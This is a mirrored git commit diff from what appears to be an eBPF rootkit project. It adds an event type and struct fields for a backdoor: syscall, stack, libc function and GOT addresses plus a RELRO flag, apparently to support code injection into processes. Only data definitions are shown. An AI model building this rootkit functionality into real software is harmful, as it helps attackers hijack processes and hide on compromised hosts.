mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-30 05:03:08 +08:00
Merged master and develop, now all changes together. Fully tested and working.
This commit is contained in:
@@ -11,7 +11,8 @@ typedef enum {
|
||||
EXIT,
|
||||
ERROR,
|
||||
COMMAND,
|
||||
PSH_UPDATE
|
||||
PSH_UPDATE,
|
||||
VULN_SYSCALL
|
||||
} event_type_t;
|
||||
|
||||
struct rb_event {
|
||||
@@ -19,6 +20,14 @@ struct rb_event {
|
||||
char message[RB_EVENT_MAX_MESSAGE_SIZE];
|
||||
int code;
|
||||
struct backdoor_phantom_shell_data bps_data;
|
||||
__u64 syscall_address;
|
||||
__u64 process_stack_return_address;
|
||||
__u64 libc_main_address;
|
||||
__u64 libc_dlopen_mode_address;
|
||||
__u64 libc_malloc_address;
|
||||
__u64 got_address;
|
||||
__s32 got_offset;
|
||||
int relro_active;
|
||||
event_type_t event_type;
|
||||
__u32 client_ip;
|
||||
__u16 client_port;
|
||||
|
||||
Reference in New Issue
Block a user